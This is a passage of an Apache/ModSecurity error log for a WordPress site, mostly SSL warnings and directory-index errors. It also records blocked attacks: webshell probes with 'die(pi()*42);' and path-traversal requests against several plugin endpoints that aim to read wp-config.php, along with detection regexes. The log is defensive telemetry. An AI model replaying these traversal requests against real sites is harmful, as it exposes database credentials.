"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAfXtvNnA6GoBBokipT21gAAAdg"] [Wed Mar 08 03:24:29.959736 2023] [ssl:warn] [pid 28829:tid 140453115717504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 08 03:24:30.137054 2023] [ssl:warn] [pid 28835:tid 140453115717504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 08 03:24:30.468205 2023] [ssl:warn] [pid 28835:tid 140453115717504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 08 03:24:32.258632 2023] [ssl:warn] [pid 28835:tid 140453115717504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 08 03:24:34.458155 2023] [ssl:warn] [pid 29251:tid 140493671954304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 08 03:24:34.571064 2023] [ssl:warn] [pid 29252:tid 140493671954304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 08 03:53:43.235440 2023] [:error] [pid 29922:tid 140493237167872] [client 152.89.196.13:40698] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-include-map.php"] [unique_id "ZAhNF0O8QsWwfe9BfkkfOQAAANY"] [Wed Mar 08 06:08:32.664374 2023] [autoindex:error] [pid 29272:tid 140493354665728] [client 152.89.196.13:46476] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Mar 08 11:54:46.712410 2023] [:error] [pid 29922:tid 140493262345984] [client 5.188.62.76:34026] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAi91kO8QsWwfe9BfkktsAAAANM"] [Wed Mar 08 19:11:52.293794 2023] [:error] [pid 23595:tid 140493245560576] [client 5.188.62.174:50910] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAkkSKTmgw-klyYO7WkNpAAAAVU"] [Thu Mar 09 03:11:27.134496 2023] [ssl:warn] [pid 10829:tid 140629012027264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 03:11:27.263252 2023] [ssl:warn] [pid 10830:tid 140629012027264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 03:11:27.705649 2023] [ssl:warn] [pid 10830:tid 140629012027264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 03:11:29.303806 2023] [ssl:warn] [pid 10830:tid 140629012027264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 03:11:31.557756 2023] [ssl:warn] [pid 11252:tid 140194753013632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 03:11:31.671627 2023] [ssl:warn] [pid 11253:tid 140194753013632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 08:42:05.803368 2023] [:error] [pid 11270:tid 140194443425536] [client 5.188.62.26:57802] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAniLSICOWSpu8fl4QoeFQAAAAc"] [Thu Mar 09 10:27:11.707733 2023] [ssl:warn] [pid 3251:tid 139735416706944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 10:27:11.823721 2023] [ssl:warn] [pid 3252:tid 139735416706944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 09 12:34:24.501609 2023] [autoindex:error] [pid 3350:tid 139735007684352] [client 47.108.95.45:40434] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/button/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/button/index.php [Thu Mar 09 12:34:28.739747 2023] [autoindex:error] [pid 3255:tid 139734982506240] [client 47.108.95.45:40440] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/button/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/button/index.php [Thu Mar 09 19:15:44.608769 2023] [autoindex:error] [pid 3255:tid 139735150360320] [client 192.185.4.92:57408] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-post/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/dist/edit-post/index.php [Thu Mar 09 22:30:45.342926 2023] [:error] [pid 3350:tid 139734982506240] [client 154.6.94.155:36708] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZAqkZfVsRB9S3Tfvu1Vp4gAAANY"] [Thu Mar 09 22:30:45.482229 2023] [:error] [pid 3350:tid 139734990898944] [client 154.6.94.155:36710] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZAqkZfVsRB9S3Tfvu1Vp4wAAANU"] [Thu Mar 09 22:30:45.657589 2023] [:error] [pid 3350:tid 139735108396800] [client 154.6.94.155:36712] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZAqkZfVsRB9S3Tfvu1Vp5AAAAMc"] [Thu Mar 09 22:30:46.756440 2023] [:error] [pid 3350:tid 139735032862464] [client 154.6.94.155:36714] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/contacto/"] [unique_id "ZAqkZvVsRB9S3Tfvu1Vp5QAAANA"] [Thu Mar 09 22:30:46.930677 2023] [:error] [pid 3254:tid 139735049647872] [client 154.6.94.155:36716] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZAqkZus0m6meiehdKLOsYAAAAE4"] [Thu Mar 09 22:30:47.973094 2023] [:error] [pid 3350:tid 139735141967616] [client 154.6.94.155:36718] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZAqkZ_VsRB9S3Tfvu1Vp5gAAAMM"] [Thu Mar 09 22:30:47.995856 2023] [:error] [pid 3350:tid 139735150360320] [client 154.6.94.155:36720] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZAqkZ_VsRB9S3Tfvu1Vp5wAAAMI"] [Thu Mar 09 22:30:48.046139 2023] [:error] [pid 3254:tid 139735024469760] [client 154.6.94.155:36722] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZAqkaOs0m6meiehdKLOsYQAAAFE"] [Thu Mar 09 22:30:48.063706 2023] [:error] [pid 3253:tid 139735032862464] [client 154.6.94.155:36724] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZAqkaLRNqT8oCsyMrUffBgAAABA"] [Thu Mar 09 22:30:49.248314 2023] [:error] [pid 3253:tid 139735236085504] [client 154.6.94.155:36726] [client 154.6.94.155] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZAqkabRNqT8oCsyMrUffBwAAAAA"] [Thu Mar 09 22:32:17.141850 2023] [autoindex:error] [pid 3255:tid 139735108396800] [client 162.241.27.55:36796] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/2020/index.php [Fri Mar 10 00:06:48.802546 2023] [:error] [pid 3255:tid 139735133574912] [client 152.89.196.13:40464] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/newsletter-optin-box/templates/contact.php"] [unique_id "ZAq66IpKm9LTVc0oEIQIGQAAAIQ"] [Fri Mar 10 00:46:25.058126 2023] [:error] [pid 3350:tid 139735116789504] [client 152.89.196.13:41930] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZArEMfVsRB9S3Tfvu1VtVwAAAMY"] [Fri Mar 10 03:16:43.944753 2023] [ssl:warn] [pid 25999:tid 139885496780672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 10 03:16:44.059904 2023] [ssl:warn] [pid 26000:tid 139885496780672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 10 03:16:44.284165 2023] [ssl:warn] [pid 26000:tid 139885496780672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 10 03:16:45.628979 2023] [ssl:warn] [pid 26000:tid 139885496780672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 10 03:16:47.876266 2023] [ssl:warn] [pid 26417:tid 140211825977216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 10 03:16:47.989193 2023] [ssl:warn] [pid 26418:tid 140211825977216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 10 14:13:28.662382 2023] [:error] [pid 26869:tid 140211489044224] [client 20.169.196.237:37088] [client 20.169.196.237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZAuBWHuziPICRqZEvCRx5AAAAMo"], referer: https://www.google.com/search? [Fri Mar 10 14:13:34.199501 2023] [:error] [pid 26435:tid 140211556185856] [client 20.169.196.237:37106] [client 20.169.196.237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZAuBXmme6ZBH7SppF5EkEAAAAAI"], referer: https://www.google.com/search? [Fri Mar 10 14:13:38.277464 2023] [:error] [pid 26438:tid 140211539400448] [client 20.169.196.237:37122] [client 20.169.196.237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZAuBYgEptxjQbT0BbxFFfgAAAIQ"], referer: https://www.google.com/search? [Fri Mar 10 14:13:40.691407 2023] [:error] [pid 26869:tid 140211531007744] [client 20.169.196.237:37132] [client 20.169.196.237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 